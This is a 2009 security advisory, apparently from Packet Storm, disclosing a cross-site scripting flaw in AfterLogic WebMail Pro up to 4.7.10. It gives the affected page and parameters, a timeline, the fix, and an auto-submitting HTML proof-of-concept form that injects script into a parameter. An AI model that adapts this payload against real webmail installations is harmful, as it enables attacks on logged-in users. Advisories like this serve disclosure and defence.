AfterLogic WebMail Pro 4.7.10 Cross Site Scripting

2009-10-06T00:00:00
ID PACKETSTORM:81833
Type packetstorm
Reporter Gardien Virtuel
Modified 2009-10-06T00:00:00

Description

                                        
                                            `Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro  
  
Description  
-------------  
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection  
of malicious code in the context of the application.  
  
Overview  
-----------  
Quote from http://www.afterlogic.com/products/webmail-pro :  
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users  
the fast AJAX webmail and innovative calendar with sharing. Stay in control  
with the admin panel and the developer's API."  
  
Details  
--------  
Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10  
Vulnerability Type : Cross-Site Scripting (XSS)  
Affected page : history-storage.aspx  
Vulnerable parameters : HistoryKey, HistoryStorageObjectName  
Discovered by :  
Sébastien Duquette (http://intheknow-security.blogspot.com)  
Gardien Virtuel (www.gardienvirtuel.com)  
Original Advisory :  
http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt  
  
Timeline  
----------  
Bug Discovered : September 18th, 2009  
Vendor Advised : September 23rd, 2009  
Fix made available : September 30th, 2009  
  
Proof of concept  
-------------------  
The targeted user must be logged in the webmail. This proof of concept was  
successfully tested in Firefox 3.5 and Internet Explorer 8.  
  
<html>  
<head>  
</head>  
<body onLoad="document.form1.submit()">  
<form name="form1" method="post"  
action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574"  
onSubmit="return false;">  
<input type="hidden" name="HistoryKey" value="value"/>  
<input type="hidden" name="HistoryStorageObjectName" value="location;  
alert('xss'); //"/>  
</form>  
</body>  
</html>  
  
Solution  
---------  
The vendor has made available a patched version. Update to AfterLogic  
Webmail Pro 4.7.11  
  
`